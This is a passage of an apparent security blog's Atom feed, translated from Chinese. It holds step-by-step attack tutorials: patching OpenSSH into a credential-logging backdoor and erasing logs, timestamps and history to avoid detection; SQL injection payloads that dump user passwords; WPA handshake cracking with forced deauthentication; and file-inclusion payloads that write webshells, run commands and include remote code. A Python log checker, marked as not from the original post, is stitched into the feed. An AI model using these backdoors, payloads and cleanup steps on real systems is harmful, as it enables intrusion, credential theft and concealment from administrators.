<li>Open the file in WinHex and Ctrl+F to search for a plaintext flag.</li>
</ol>
</summary>
</entry>
<entry>
<title>Cracking a ZTE TV set-top box</title>
<link href="http://fdrag0n.github.io/2018/07/19/%E7%A0%B4%E8%A7%A3%E4%B8%AD%E5%85%B4%E7%94%B5%E8%A7%86%E7%9B%92%E5%AD%90/"/>
<id>http://fdrag0n.github.io/2018/07/19/破解中兴电视盒子/</id>
<published>2018-07-18T16:59:29.000Z</published>
<updated>2019-08-19T03:00:34.180Z</updated>
<content type="html"><![CDATA[<h1 id="记一次破解电信盒子"><a href="#记一次破解电信盒子" class="headerlink" title="记一次破解电信盒子"></a>Notes on cracking a China Telecom set-top box</h1><h2 id="型号-ZTEB860AV1-1"><a href="#型号-ZTEB860AV1-1" class="headerlink" title="型号 ZTEB860AV1.1"></a>Model ZTEB860AV1.1</h2><p>Having already done this on the family's TCL TV, the process was clear:</p><ol><li>Enable network ADB debugging</li><li>Do whatever you like</li></ol><a id="more"></a><h3 id="开始"><a href="#开始" class="headerlink" title="开始"></a>Getting started</h3><ul><li>A Baidu search shows the password for the settings menu is 6321.<br>After entering settings, connect to WiFi and find the option to enable ADB debugging, only to discover that enabling ADB also needs a password; these people really went all out to lock down their users. Fortunately a Baidu search turned up ready-made software; link below</li></ul><ul><li>Tool: <a href="https://pan.baidu.com/s/1TbV688Vi2-WjdOWUKg_Mpg" title="百度云" target="_blank" rel="noopener">related software</a> </li><li><p>Use network ADB to install a TV management app or a third-party launcher on the box, then do as you please.</p></li><li><p>Another problem came up here: the ISP plugs the network cable into the IPTV port of the optical modem, and that line is a dedicated one that cannot be used normally. On boot the box checks whether it is on that network and refuses to boot normally otherwise, so on every boot the network setting has to be switched to wired by hand. With third-party apps, just connect wirelessly to the LAN instead. I have not found a better solution yet.</p></li></ul>]]></content>
<summary type="html">
<h1 id="记一次破解电信盒子"><a href="#记一次破解电信盒子" class="headerlink" title="记一次破解电信盒子"></a>Notes on cracking a China Telecom set-top box</h1>
<h2 id="型号-ZTEB860AV1-1"><a href="#型号-ZTEB860AV1-1" class="headerlink" title="型号 ZTEB860AV1.1"></a>Model ZTEB860AV1.1</h2><p>Having already done this on the family's TCL TV, the process was clear:</p>
<ol>
<li>Enable network ADB debugging</li>
<li>Do whatever you like</li>
</ol>
</summary>
</entry>
<entry>
<title>Reproducing an SSH backdoor</title>
<link href="http://fdrag0n.github.io/2018/05/15/SSH%E5%90%8E%E9%97%A8%E5%A4%8D%E7%8E%B0/"/>
<id>http://fdrag0n.github.io/2018/05/15/SSH后门复现/</id>
<published>2018-05-15T12:01:46.000Z</published>
<updated>2019-08-19T03:00:40.735Z</updated>
<content type="html"><![CDATA[<h1 id="SSH后门复现"><a href="#SSH后门复现" class="headerlink" title="SSH后门复现"></a>Reproducing an SSH backdoor</h1><h3 id="最开始先查看自己的ssh版本"><a href="#最开始先查看自己的ssh版本" class="headerlink" title="最开始先查看自己的ssh版本"></a>First, check your own SSH version</h3><pre><code>ssh -V</code></pre><a id="more"></a><h3 id="然后下载openssh和ssh后门"><a href="#然后下载openssh和ssh后门" class="headerlink" title="然后下载openssh和ssh后门"></a>Then download OpenSSH and the SSH backdoor</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz</span><br><span class="line">wget http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz</span><br><span class="line">tar zxvf openssh-5.9p1.tar.gz</span><br><span class="line">tar zxvf 0x06-openssh-5.9p1.patch.tar.gz</span><br><span class="line">cd openssh-5.9p1.patch/</span><br><span class="line">cp sshbd5.9p1.diff ../openssh-5.9p1</span><br><span class="line">cd ../openssh-5.9p1</span><br><span class="line">patch < sshbd5.9p1.diff //apply the backdoor patch</span><br></pre></td></tr></table></figure><p>At this point you may get the error<br><strong>-bash: patch: command not found</strong><br>which means the patch package is not installed. Fix:</p><pre><code>yum -y install patch</code></pre><h3 id="备份SSH原始配置文件"><a href="#备份SSH原始配置文件" class="headerlink" title="备份SSH原始配置文件"></a>Back up the original SSH configuration files</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old</span><br><span class="line">mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old</span><br></pre></td></tr></table></figure><h3 id="修改后门密码,和记录文件的位置"><a href="#修改后门密码,和记录文件的位置" class="headerlink" title="修改后门密码,和记录文件的位置"></a>Change the backdoor password and the log file locations</h3><pre><code>vi includes.h</code></pre><p>Find and modify:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#define ILOG "/tmp/ilog"</span><br><span class="line">//logs the usernames and passwords of logins to this host</span><br><span class="line">#define OLOG "/tmp/olog"</span><br><span class="line">//logs the usernames and passwords used to log in from this host to remote hosts</span><br><span class="line">#define SECRETPW "fdrag0n"</span><br><span class="line">//your backdoor password</span><br></pre></td></tr></table></figure><h3 id="修改SSH版本信息,改为第一步看到的"><a href="#修改SSH版本信息,改为第一步看到的" class="headerlink" title="修改SSH版本信息,改为第一步看到的"></a>Change the SSH version string to the one seen in the first step</h3><pre><code>vi version.h</code></pre><h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>Environment setup</h3><p>Without the following packages the build may fail</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">yum install -y gcc</span><br><span class="line">yum install -y openssl openssl-devel pam-devel</span><br><span class="line">./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5</span><br></pre></td></tr></table></figure><p>If the error output contains something like<br><strong>configure: error: zlib.h missing – please install first or check config.log</strong><br>install the zlib development package</p><pre><code>yum install -y zlib-devel</code></pre><h3 id="安装并重启SSH"><a href="#安装并重启SSH" class="headerlink" title="安装并重启SSH"></a>Install and restart SSH</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">make && make install</span><br><span class="line">service sshd restart</span><br></pre></td></tr></table></figure><h3 id="简单处理记录"><a href="#简单处理记录" class="headerlink" title="简单处理记录"></a>Basic log cleanup</h3><h4 id="还原新配置文件为旧配置文件时间"><a href="#还原新配置文件为旧配置文件时间" class="headerlink" title="还原新配置文件为旧配置文件时间"></a>Reset the new config files' timestamps to those of the old ones</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config</span><br><span class="line">touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config</span><br></pre></td></tr></table></figure><p>This makes the modification times of ssh_config and sshd_config match ssh_config.old and sshd_config.old, reducing the chance of detection.</p><h4 id="清除apache日志"><a href="#清除apache日志" class="headerlink" title="清除apache日志"></a>Clear the Apache logs</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">export HISTFILE=/dev/null </span><br><span class="line">export HISTSIZE=0 </span><br><span class="line">cd /etc/httpd/logs/ </span><br><span class="line">sed -i '/192.168.52.175/d' access_log* </span><br><span class="line">echo >/root/.bash_history //clear the command history</span><br></pre></td></tr></table></figure><h4 id="清除用户目录下的-bash-history文件"><a href="#清除用户目录下的-bash-history文件" class="headerlink" title="清除用户目录下的.bash_history文件"></a>Clear the .bash_history file in the user's home directory</h4><pre><code>vi .bash_history</code></pre><p>Then delete everything and save.</p>]]></content>
<summary type="html">
<h1 id="SSH后门复现"><a href="#SSH后门复现" class="headerlink" title="SSH后门复现"></a>Reproducing an SSH backdoor</h1>
<h3 id="最开始先查看自己的ssh版本"><a href="#最开始先查看自己的ssh版本" class="headerlink" title="最开始先查看自己的ssh版本"></a>First, check your own SSH version</h3><pre><code>ssh -V
</code></pre>
</summary>
</entry>
<entry>
<title>Manual SQL injection steps (non-blind)</title>
<link href="http://fdrag0n.github.io/2018/05/05/sql%E6%89%8B%E6%B3%A8%E6%AD%A5%E9%AA%A4/"/>
<id>http://fdrag0n.github.io/2018/05/05/sql手注步骤/</id>
<published>2018-05-05T03:52:16.000Z</published>
<updated>2019-08-19T03:00:47.758Z</updated>
<content type="html"><![CDATA[<h1 id="手注步骤"><a href="#手注步骤" class="headerlink" title="手注步骤"></a>Manual injection steps</h1><a id="more"></a><h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>Contents</h2><p><strong>1. Determine whether an injection exists, and whether it is string-based or numeric</strong></p><p><strong>2. Guess the number of columns in the SQL query</strong></p><p><strong>3. Determine the order of the displayed columns</strong></p><p><strong>4. Get the current database</strong></p><p><strong>5. Get the tables in the database</strong></p><p><strong>6. Get the column names of the table</strong></p><p><strong>7. Dump the data</strong></p><h2 id="1-判断是否存在注入,注入是字符型还是数字型"><a href="#1-判断是否存在注入,注入是字符型还是数字型" class="headerlink" title="1.判断是否存在注入,注入是字符型还是数字型"></a>1. Determine whether an injection exists, and whether it is string-based or numeric</h2><p>Determine the injection type: <strong>numeric or string</strong></p><h2 id="2-猜解SQL查询语句中的字段数"><a href="#2-猜解SQL查询语句中的字段数" class="headerlink" title="2.猜解SQL查询语句中的字段数"></a>2. Guess the number of columns in the SQL query</h2><p>Determine the number of columns:</p><pre><code>1' or 1=1 order by 1,2,3,4,5 #</code></pre><p>Increase the numbers until no result is returned or an error occurs.</p><hr><p><strong>The comment terminator is usually <code>--+</code>, <code>#</code> or <code>%23</code></strong></p><hr><p>Or use:</p><pre><code>-1' union select 1,2 #</code></pre><hr><p><strong>When two SQL statements are combined with UNION and the first one selects nothing, the result of the second statement is displayed instead</strong></p><hr><p>This leads straight into the next step</p><h2 id="3-确定显示的字段顺序"><a href="#3-确定显示的字段顺序" class="headerlink" title="3.确定显示的字段顺序"></a>3. Determine the order of the displayed columns</h2><pre><code>-1' union select 1,2 #</code></pre><h2 id="4-获取当前数据库"><a href="#4-获取当前数据库" class="headerlink" title="4.获取当前数据库"></a>4. Get the current database</h2><pre><code>-1' union select 1,database() #</code></pre><h2 id="5-获取数据库中的表"><a href="#5-获取数据库中的表" class="headerlink" title="5.获取数据库中的表"></a>5. Get the tables in the database</h2><pre><code>-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #</code></pre><p>Look up the table names in information_schema</p><hr><p><strong>In a UNION query, put the lookup expression in the last column position</strong></p><hr><h2 id="6-获取表中的字段名"><a href="#6-获取表中的字段名" class="headerlink" title="6.获取表中的字段名"></a>6. Get the column names of the table</h2><pre><code>-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #</code></pre><p>Dump the column names of the users table</p><h2 id="7-下载数据"><a href="#7-下载数据" class="headerlink" title="7.下载数据"></a>7. Dump the data</h2><pre><code>-1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #</code></pre><p>Retrieve the user_id, first_name, last_name and password of every user in users</p>]]></content>
<summary type="html">
<h1 id="手注步骤"><a href="#手注步骤" class="headerlink" title="手注步骤"></a>Manual injection steps</h1>
</summary>
<category term="sql" scheme="http://fdrag0n.github.io/categories/sql/"/>
<category term="sql" scheme="http://fdrag0n.github.io/tags/sql/"/>
</entry>
<entry>
<title>Cracking WPA/WPA2 WiFi with Kali (the aesthetics of brute force)</title>
<link href="http://fdrag0n.github.io/2018/05/01/%E5%88%A9%E7%94%A8kali%E7%A0%B4%E8%A7%A3wpa-wpa2%E5%8A%A0%E5%AF%86%E7%9A%84WIFI%EF%BC%88%E7%88%86%E7%A0%B4%E7%BE%8E%E5%AD%A6%EF%BC%89/"/>
<id>http://fdrag0n.github.io/2018/05/01/利用kali破解wpa-wpa2加密的WIFI(爆破美学)/</id>
<published>2018-05-01T14:26:38.000Z</published>
<updated>2019-08-19T03:00:57.541Z</updated>
<content type="html"><![CDATA[<h1 id="利用kali破解wpa-wpa2加密的WIFI(爆破美学)"><a href="#利用kali破解wpa-wpa2加密的WIFI(爆破美学)" class="headerlink" title="利用kali破解wpa/wpa2加密的WIFI(爆破美学)"></a>Cracking WPA/WPA2 WiFi with Kali (the aesthetics of brute force)</h1><h2 id="硬件准备阶段:"><a href="#硬件准备阶段:" class="headerlink" title="硬件准备阶段:"></a>Hardware preparation:</h2><p>Because Kali installed in a VM does not support the laptop's built-in wireless card, you need to buy a card that Kali supports. I bought one with the <strong>RT3070L chipset</strong>; on Taobao a bare one is only 20 yuan and a cased one 25.</p><a id="more"></a><p>Kali must recognise the card; use <strong>ifconfig</strong> to view the interface information, where wlan0 is the wireless card.<img src="https://s1.ax1x.com/2018/05/01/CJh0tx.jpg" alt="CJh0tx.jpg"></p><h2 id="攻击准备阶段:"><a href="#攻击准备阶段:" class="headerlink" title="攻击准备阶段:"></a>Attack preparation:</h2><h3 id="开启网卡监听模式:"><a href="#开启网卡监听模式:" class="headerlink" title="开启网卡监听模式:"></a>Put the card into monitor mode:</h3><pre><code>airmon-ng start wlan0</code></pre><p>If it succeeds the interface name changes to wlan0mon<br><img src="https://s1.ax1x.com/2018/05/01/CJhwA1.jpg" alt="CJhwA1.jpg"></p><h3 id="扫描热点:"><a href="#扫描热点:" class="headerlink" title="扫描热点:"></a>Scan for access points:</h3><pre><code>airodump-ng wlan0mon</code></pre><p>You will see output like the screenshot<img src="https://s1.ax1x.com/2018/05/01/CJha7R.md.jpg" alt="CJha7R.md.jpg"></p><h3 id="抓握手包:"><a href="#抓握手包:" class="headerlink" title="抓握手包:"></a>Capture the handshake:</h3><p>-c is the channel, --bssid the MAC address of the access point, and -w the directory and base name for the captured packets.</p><pre><code>airodump-ng wlan0mon -c 4 --bssid XX:XX:XX:XX -w /root
-c         channel, matching the CH column in the screenshot above
--bssid    MAC address of the target WiFi
-w         path and name of the cap file
wlan0mon   name of the interface in monitor mode</code></pre><p>When a client connects, the handshake is captured.<img src="https://s1.ax1x.com/2018/05/01/CJhUB9.jpg" alt="CJhUB9.jpg"></p><h4 id="如果对面都在使用wifi,没人连接怎么办?"><a href="#如果对面都在使用wifi,没人连接怎么办?" class="headerlink" title="如果对面都在使用wifi,没人连接怎么办?"></a>What if everyone is already on the WiFi and nobody connects?</h4><p>Use the following command to disconnect a device from the WiFi</p><pre><code>aireplay-ng -0 20 -a A8:6B:7C:19:9F:D0 -c 4C:49:E3:D8:FD:7F wlan0mon
-0   deauth (forced disconnect) mode; 20 is the number of times to send it
-c   MAC of the client to kick off
-a   MAC of the WiFi access point</code></pre><p>When the capture succeeds, the handshake notice appears in the white circle.<br><img src="https://s1.ax1x.com/2018/05/01/CJhUB9.jpg" alt="CJhUB9.jpg"></p><h3 id="爆破:"><a href="#爆破:" class="headerlink" title="爆破:"></a>Cracking:</h3><h4 id="kali:"><a href="#kali:" class="headerlink" title="kali:"></a>kali:</h4><p>Use the aircrack-ng command</p><pre><code>aircrack-ng -w wordlist handshake.cap</code></pre><p>Running this on the CPU is rather slow.</p><h4 id="windows:"><a href="#windows:" class="headerlink" title="windows:"></a>windows:</h4><h5 id="神器1:"><a href="#神器1:" class="headerlink" title="神器1:"></a>Tool 1:</h5><p>EWSA. Version 7.x supports GPU acceleration but has no cracked build; the trial shows only the first two characters of the password, and a licence costs $299 (outrageously expensive)</p><h5 id="神器2:"><a href="#神器2:" class="headerlink" title="神器2:"></a>Tool 2:</h5><p>oclHashcat is a bit involved to use; it is a command-line tool for Windows with very impressive cracking speed.<br>A Chinese developer has written a Chinese-language GUI for it, which lowers the barrier; link: <a href="https://www.iteknical.com/hashcat-gui-cn/" target="_blank" rel="noopener">HashcatGUI_cn – HashcatGUI Chinese edition</a></p>]]></content>
<summary type="html">
<h1 id="利用kali破解wpa-wpa2加密的WIFI(爆破美学)"><a href="#利用kali破解wpa-wpa2加密的WIFI(爆破美学)" class="headerlink" title="利用kali破解wpa/wpa2加密的WIFI(爆破美学)"></a>Cracking WPA/WPA2 WiFi with Kali (the aesthetics of brute force)</h1><h2 id="硬件准备阶段:"><a href="#硬件准备阶段:" class="headerlink" title="硬件准备阶段:"></a>Hardware preparation:</h2><p>Because Kali installed in a VM does not support the laptop's built-in wireless card, you need to buy a card that Kali supports. I bought one with the <strong>RT3070L chipset</strong>; on Taobao a bare one is only 20 yuan and a cased one 25.</p>
</summary>
<category term="kali" scheme="http://fdrag0n.github.io/categories/kali/"/>
<category term="kali" scheme="http://fdrag0n.github.io/tags/kali/"/>
</entry>
<entry>
<title>Common commands for file inclusion vulnerabilities</title>
<link href="http://fdrag0n.github.io/2018/04/09/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4/"/>
<id>http://fdrag0n.github.io/2018/04/09/文件包含漏洞常用命令/</id>
<published>2018-04-09T08:56:35.000Z</published>
<updated>2019-08-19T03:01:02.385Z</updated>
<content type="html"><![CDATA[<h1 id="主要包含形式"><a href="#主要包含形式" class="headerlink" title="主要包含形式"></a>Main inclusion forms</h1><h2 id="1-包含本地文件"><a href="#1-包含本地文件" class="headerlink" title="1.包含本地文件"></a>1. Including local files</h2><p>payload:</p><a id="more"></a><pre><code>?page=C:\oneword
?file=C:\boot.ini                                (Windows: read the system version)
?file=C:\Windows\System32\inetsrv\MetaBase.xml   (Windows: read the IIS configuration file)</code></pre><h2 id="2-包含远程文件"><a href="#2-包含远程文件" class="headerlink" title="2.包含远程文件"></a>2. Including remote files</h2><p>payload:</p><pre><code>?url=http://www.bbb.com/2.txt
?url=[http|https|ftp]://www.bbb.com/2.txt   (three schemes are possible: http, https, ftp)</code></pre><h2 id="3-伪协议"><a href="#3-伪协议" class="headerlink" title="3.伪协议"></a>3. Pseudo-protocols (stream wrappers)</h2><p>1) php://input</p><p>Description:</p><p>Reads the raw POST data. Through php://input we can submit our own code and have it executed.</p><p>Conditions:</p><p>PHP <5.0: usable even with allow_url_include=Off</p><p>PHP > 5.0: usable only with allow_url_fopen=On</p><p>Example 1, write a one-line webshell:</p><p>URL:</p><pre><code>http://localhost/include/file.php?file=php://input</code></pre><p>POST:</p><pre><code><?php fputs(fopen("shell.php","a"),"<?php phpinfo();?>") ?></code></pre><p>Example 2, create a file:</p><p>URL:<br><code>http://localhost/include/file.php?file=php://input</code><br>POST:<br><code><?php fputs(fopen("oneword.php","w"),"<?php phpinfo();?>") ?></code><br>Here the fopen mode is w, which creates a new file.</p><p>Example 3, run a system command:</p><p>URL:<br><code>http://localhost/include/file.php?file=php://input</code><br>POST:<br><code><?php system('ipconfig');?></code></p><hr><p>2) data://</p><p>Description:</p><p>This is a data stream wrapper, the data: URI scheme (the URI can take many forms)</p><p>The idea behind code execution through the data:// pseudo-protocol is the same as with php://: both rely on PHP's stream abstraction, redirecting the file stream that include would normally read to an input stream the user controls</p><p>Conditions:</p><p>allow_url_include=On<br>php > 5.2</p><hr><p>3) <strong>php://filter</strong></p><p>Description:</p><p>This one is used to read source code. Including a PHP file directly executes it, so its source cannot be seen; reading it through a filter works, with Base64 encoding applied first so it survives transfer:</p><pre><code>?page=php://filter/read=convert.base64-encode/resource=php.ini</code></pre><p>Requesting the URL above returns the Base64-encoded contents of config.php; decode it to get the source</p><p><strong>payload:</strong></p><pre><code>http://localhost/file.php?file=php://filter/read=convert.base64-encode/resource=file.php</code></pre><p>Source:<br><a href="https://www.anquanke.com/post/id/86123" title="参考网站" target="_blank" rel="noopener">https://www.anquanke.com/post/id/86123</a></p>]]></content>
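A defender-side check for the three inclusion forms listed above, as an added example that is not from the original post: classify the value of an include parameter as local path, remote URL or PHP stream wrapper, and resolve it against a fixed allowlist so that none of the payload shapes ever reaches include(). The wrapper list goes a little beyond the page's php:// and data:// to other real PHP wrappers (file, phar, zip, glob); the parameter names, allowlist and access-log lines are constructed.

```python
"""Classify include-parameter values into the post's three forms and resolve
them against an allowlist; then run that over constructed access-log lines.

Added example code, not from the original post. The allowlist, parameter names
and log lines are constructed; the wrapper names are real PHP stream wrappers.
"""
import re
from urllib.parse import parse_qs, urlsplit

REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# php:// and data:// are the wrappers the post covers; the rest are other
# PHP wrappers an include() parameter should never be allowed to name.
WRAPPER_RE = re.compile(r"^(php|data|file|phar|zip|glob):(//)?", re.IGNORECASE)
INCLUDE_PARAMS = ("file", "page", "url")  # the parameter names used in the post


def classify(value):
    """('pseudo-protocol', wrapper) | ('remote', scheme) | ('local', value)."""
    m = WRAPPER_RE.match(value)
    if m:
        return ("pseudo-protocol", m.group(1).lower())
    for scheme in REMOTE_SCHEMES:
        if value.lower().startswith(scheme):
            return ("remote", scheme[:-3])
    return ("local", value)


def resolve_include(value, allowlist):
    """Return the allowlisted page name or None.

    Only a bare token of letters, digits, '_' or '-' is even considered, so
    drive letters, slashes, dots and '://' can never reach include().
    """
    if not re.fullmatch(r"[A-Za-z0-9_-]+", value):
        return None
    return value if value in allowlist else None


def flag_requests(log_lines, allowlist):
    """(line_no, param, kind, detail) for every include parameter that would
    not resolve through the allowlist; expects common-log-format lines."""
    flagged = []
    for no, line in enumerate(log_lines, 1):
        target = line.split('"')[1].split(" ")[1]  # request target of the CLF line
        for param, values in parse_qs(urlsplit(target).query).items():
            if param not in INCLUDE_PARAMS:
                continue
            if resolve_include(values[0], allowlist) is None:
                kind, detail = classify(values[0])
                flagged.append((no, param, kind, detail))
    return flagged


# Constructed sample log; the query strings mirror the payload shapes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Apr/2018:08:56:35 +0000] "GET /file.php?file=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Apr/2018:08:57:01 +0000] "GET /include/file.php?file=php://input HTTP/1.1" 200 88',
    '10.0.0.9 - - [09/Apr/2018:08:57:30 +0000] "GET /file.php?file=php://filter/read=convert.base64-encode/resource=file.php HTTP/1.1" 200 3021',
    '10.0.0.9 - - [09/Apr/2018:08:58:12 +0000] "GET /file.php?url=http://www.bbb.com/2.txt HTTP/1.1" 200 44',
    '10.0.0.9 - - [09/Apr/2018:08:58:40 +0000] "GET /file.php?page=C:%5Cboot.ini HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG, allowlist=("home", "about")):
        print(hit)
```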
<summary type="html">
<h1 id="主要包含形式"><a href="#主要包含形式" class="headerlink" title="主要包含形式"></a>Main inclusion forms</h1><h2 id="1-包含本地文件"><a href="#1-包含本地文件" class="headerlink" title="1.包含本地文件"></a>1. Including local files</h2><p>payload:</p>
</summary>
</entry>
<entry>
<title>Building a mobile pentest toolkit: installing Kali Linux NetHunter</title>
<link href="http://fdrag0n.github.io/2018/03/10/%E6%89%93%E9%80%A0%E6%89%8B%E6%9C%BA%E6%B8%97%E9%80%8F%E7%A5%9E%E5%99%A8kali-linux-nethunter%E5%AE%89%E8%A3%85/"/>
<id>http://fdrag0n.github.io/2018/03/10/打造手机渗透神器kali-linux-nethunter安装/</id>
<published>2018-03-10T04:59:57.000Z</published>
<updated>2019-08-19T03:01:07.303Z</updated>
<content type="html"><![CDATA[<h1 id="一加1(bacon)-Kali-Nethunter安装指南"><a href="#一加1(bacon)-Kali-Nethunter安装指南" class="headerlink" title="一加1(bacon) Kali Nethunter安装指南"></a>OnePlus One (bacon) Kali NetHunter installation guide</h1><h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>Preparation</h2><ol><li><h3 id="准备一加一手机"><a href="#准备一加一手机" class="headerlink" title="准备一加一手机"></a>Prepare a OnePlus One</h3><ul><li>Unlock it, flash CM12 and boot it once (MoKee also worked for me; in theory any Android 6.0 ROM will do)</li><li><p>Flash TWRP recovery</p><a id="more"></a></li></ul></li><li><h3 id="官网下载刷机包"><a href="#官网下载刷机包" class="headerlink" title="官网下载刷机包"></a>Download the flashable packages from the official site</h3><hr><h4 id="夜版(nightly)"><a href="#夜版(nightly)" class="headerlink" title="夜版(nightly)"></a>Nightly build</h4><p>Main package:<br><a href="https://build.nethunter.com/nightly/2017.11-18-1618/nethunter-generic-armhf-kalifs-full-rolling-2017.11-18-1618.zip" title="ARM框架用" target="_blank" rel="noopener">https://build.nethunter.com/nightly/2017.11-18-1618/nethunter-generic-armhf-kalifs-full-rolling-2017.11-18-1618.zip</a></p><p>Kernel:<br>6.0 <a href="https://build.nethunter.com/nightly/2017.11-18-1618/kernel-nethunter-oneplus1-marshmallow-2017.11-18-1618.zip" title="安卓6.0" target="_blank" rel="noopener">https://build.nethunter.com/nightly/2017.11-18-1618/kernel-nethunter-oneplus1-marshmallow-2017.11-18-1618.zip</a></p><hr><h4 id="正式版(强烈推荐)"><a href="#正式版(强烈推荐)" class="headerlink" title="正式版(强烈推荐)"></a>Release build (strongly recommended)</h4><p>Main package:<br><a href="https://build.nethunter.com/release/marshmallow/nethunter-oneplus1-marshmallow-kalifs-full-3.20-20170717-1810.zip" title="适用于一加1的正式版" target="_blank" rel="noopener">https://build.nethunter.com/release/marshmallow/nethunter-oneplus1-marshmallow-kalifs-full-3.20-20170717-1810.zip</a></p><hr></li><li><h3 id="刷机"><a href="#刷机" class="headerlink" title="刷机"></a>Flashing</h3><ul><li>Do NOT wipe data and cache, do NOT wipe, do NOT wipe (if data is wiped the flash fails)</li><li>Flash the main package (release build) from recovery</li><li>(For the nightly, flash the kernel first and then the main package)</li></ul></li></ol>]]></content>
<summary type="html">
<h1 id="一加1(bacon)-Kali-Nethunter安装指南"><a href="#一加1(bacon)-Kali-Nethunter安装指南" class="headerlink" title="一加1(bacon) Kali Nethunter安装指南"></a>OnePlus One (bacon) Kali NetHunter installation guide</h1><h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>Preparation</h2><ol>
<li><h3 id="准备一加一手机"><a href="#准备一加一手机" class="headerlink" title="准备一加一手机"></a>Prepare a OnePlus One</h3><ul>
<li>Unlock it, flash CM12 and boot it once (MoKee also worked for me; in theory any Android 6.0 ROM will do)</li>
<li><p>Flash TWRP recovery</p>
</summary>
<category term="kali" scheme="http://fdrag0n.github.io/categories/kali/"/>
<category term="kali" scheme="http://fdrag0n.github.io/tags/kali/"/>
</entry>
<entry>
<title>Notes on removing the adware from a site's "high-speed download"</title>
<link href="http://fdrag0n.github.io/2018/02/11/%E8%AE%B0%E4%B8%80%E6%AC%A1%E8%A7%A3%E5%86%B3%E6%9F%90%E7%BD%91%E7%AB%99%E9%AB%98%E9%80%9F%E4%B8%8B%E8%BD%BD%E7%97%85%E6%AF%92/"/>
<id>http://fdrag0n.github.io/2018/02/11/记一次解决某网站高速下载病毒/</id>
<published>2018-02-11T03:19:04.000Z</published>
<updated>2019-08-19T03:01:11.640Z</updated>
<content type="html"><![CDATA[<h1 id="怒草流氓软件"><a href="#怒草流氓软件" class="headerlink" title="怒草流氓软件"></a>Fighting off adware</h1><p>I downloaded a program from a certain website, accidentally used the "high-speed download" option, and got adware installed along with it.<br>It popped up ads on every boot, yet it was not in the startup items. After killing the adware via its process and deleting it, an explorer.exe warning appeared on every boot; a search online turned up the fix. </p><a id="more"></a><p>Under the registry key <strong>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</strong> there is a value pointing at the adware's path (this key's Load value is a legacy autostart location processed at logon, which is why the warning came from explorer.exe once the file was gone). Delete that value, reboot, and the problem is solved.</p>]]></content>
<summary type="html">
<h1 id="怒草流氓软件"><a href="#怒草流氓软件" class="headerlink" title="怒草流氓软件"></a>Fighting off adware</h1><p>I downloaded a program from a certain website, accidentally used the "high-speed download" option, and got adware installed along with it.<br>It popped up ads on every boot, yet it was not in the startup items. After killing the adware via its process and deleting it, an explorer.exe warning appeared on every boot; a search online turned up the fix. </p>
</summary>
<category term="病毒" scheme="http://fdrag0n.github.io/tags/%E7%97%85%E6%AF%92/"/>
</entry>
<entry>
<title>Fixing Kali update source problems</title>
<link href="http://fdrag0n.github.io/2018/02/06/kali%E6%9B%B4%E6%96%B0%E6%BA%90%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88/"/>
<id>http://fdrag0n.github.io/2018/02/06/kali更新源问题解决方案/</id>
<published>2018-02-06T04:17:06.000Z</published>
<updated>2019-08-19T03:01:20.656Z</updated>
